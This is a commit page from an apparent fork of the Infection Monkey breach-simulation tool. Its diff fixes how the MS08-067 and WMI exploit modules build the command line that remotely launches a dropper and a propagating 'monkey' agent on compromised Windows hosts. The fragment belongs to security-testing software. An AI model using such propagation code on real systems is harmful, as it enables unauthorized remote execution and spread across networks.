p15693087
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests 1 Projects Releases Wiki Activity

Fix dropper bug on wmiexec and win_ms08_067

This commit is contained in:
Itay Mizeretz 2017-09-04 16:51:22 +03:00
parent 40b03793c9
commit b420f74a55
2 changed files with 8 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
chaos_monkey/exploit/win_ms08_067.py
View File

@ -249,11 +249,11 @@ class Ms08_067_Exploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(host, depth - 1, self._config.dropper_target_path)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
cmdline += build_monkey_commandline(host, depth - 1)
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(host, depth - 1)
try:
sock.send("start %s\r\n" % (cmdline, ))

8
chaos_monkey/exploit/wmiexec.py
View File

@ -84,11 +84,11 @@ class WmiExploiter(HostExploiter):
return False
# execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(host, depth - 1, self._config.dropper_target_path)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
cmdline += build_monkey_commandline(host, depth - 1)
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(host, depth - 1)
# execute the remote monkey
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,